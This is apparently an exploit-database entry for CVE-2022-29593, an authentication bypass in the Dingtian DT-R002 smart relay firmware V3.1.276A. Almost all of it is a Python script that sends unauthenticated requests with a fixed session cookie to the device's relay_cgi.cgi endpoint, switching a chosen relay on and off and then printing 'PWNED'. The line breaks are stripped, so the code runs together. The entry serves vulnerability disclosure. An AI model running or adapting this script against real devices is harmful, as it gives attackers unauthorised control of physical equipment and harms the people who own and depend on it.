Dingtian-DT-R002 3.1.276A Authentication Bypass

# Exploit Title: Dingtian-DT-R002 3.1.276A - Authentication Bypass# Google Dork: NA# Date: 13th July 2022# Exploit Author: Victor Hanna (Trustwave SpiderLabs)# Author Github Page: https://9lyph.github.io/CVE-2022-29593/# Vendor Homepage: https://www.dingtian-tech.com/en_us/relay4.html# Software Link: https://www.dingtian-tech.com/en_us/support.html?tab=download# Version: V3.1.276A# Tested on: MAC OSX# CVE : CVE-2022-29593#!/usr/local/bin/python3# Author: Victor Hanna (SpiderLabs)# DingTian DT-R002 2CH Smart Relay# CWE-294 - Authentication Bypass by Capture-replayimport requestsimport reimport urllib.parsefrom colorama import initfrom colorama import Fore, Back, Styleimport sysimport osimport timefrom urllib3.exceptions import InsecureRequestWarningrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)def banner():    print ("[+]********************************************************************************[+]")    print ("|   Author : Victor Hanna (9lyph)["+Fore.RED + "SpiderLabs" +Style.RESET_ALL+"]\t\t\t\t\t    |")    print ("|   Description: DingTian DT-R002 2CH Smart Relay                                      |")    print ("|   Usage : "+sys.argv[0]+" <host> <relay#>                                           |")       print ("[+]********************************************************************************[+]")def main():    os.system('clear')    banner()    urlRelay1On  = "http://"+host+"/relay_cgi.cgi?type=0&relay=0&on=1&time=0&pwd=0&"    urlRelay1Off = "http://"+host+"/relay_cgi.cgi?type=0&relay=0&on=0&time=0&pwd=0&"    urlRelay2On  = "http://"+host+"/relay_cgi.cgi?type=0&relay=1&on=1&time=0&pwd=0&"    urlRelay2Off = "http://"+host+"/relay_cgi.cgi?type=0&relay=1&on=0&time=0&pwd=0&"    headers = {        "Host": ""+host+"",        "User-Agent": "9lyph/3.0",        "Accept": "*/*",        "Accept-Language": "en-US,en;q=0.5",        "Accept-Encoding": "gzip, deflate",        "DNT": "1",        "Connection": "close",        "Referer": "http://"+host+"/relay_cgi.html",        "Cookie": "session=4463009"    }    print (Fore.YELLOW + f"[+] Exploiting" + Style.RESET_ALL, flush=True, end=" ")    for i in range(5):        time.sleep (1)        print (Fore.YELLOW + "." + Style.RESET_ALL, flush=True, end="")    try:        if (relay == "1"):            print (Fore.GREEN + "\n[+] Relay 1 switched on !" + Style.RESET_ALL)            r = requests.get(urlRelay1On)            time.sleep (5)            print (Fore.GREEN + "[+] Relay 1 switched off !" + Style.RESET_ALL)            r = requests.get(urlRelay1Off)            print (Fore.YELLOW + "PWNED !!!" + Style.RESET_ALL, flush=True, end="")        elif (relay == "2"):            print (Fore.GREEN + "[+] Relay 2 switched on !" + Style.RESET_ALL)            r = requests.get(urlRelay2On)            time.sleep (5)            print (Fore.GREEN + "[+] Relay 2 switched on !" + Style.RESET_ALL)            r = requests.get(urlRelay2Off)            print (Fore.YELLOW + "PWNED !!!" + Style.RESET_ALL, flush=True, end="")        else:            print (Fore.RED + "[!] No such relay" + Style.RESET_ALL)    except KeyboardInterrupt:        sys.exit(1)    except requests.exceptions.Timeout:        print ("[!] Connection to host timed out !")        sys.exit(1)    except requests.exceptions.Timeout:        print ("[!] Connection to host timed out !")        sys.exit(1)    except Exception as e:        print (Fore.RED + f"[+] You came up short I\'m afraid !" + Style.RESET_ALL)if __name__ == "__main__":    if len(sys.argv)>2:            host = sys.argv[1]        relay = sys.argv[2]        main ()    else:        print (Fore.RED + f"[+] Not enough arguments, please specify target and relay!" + Style.RESET_ALL)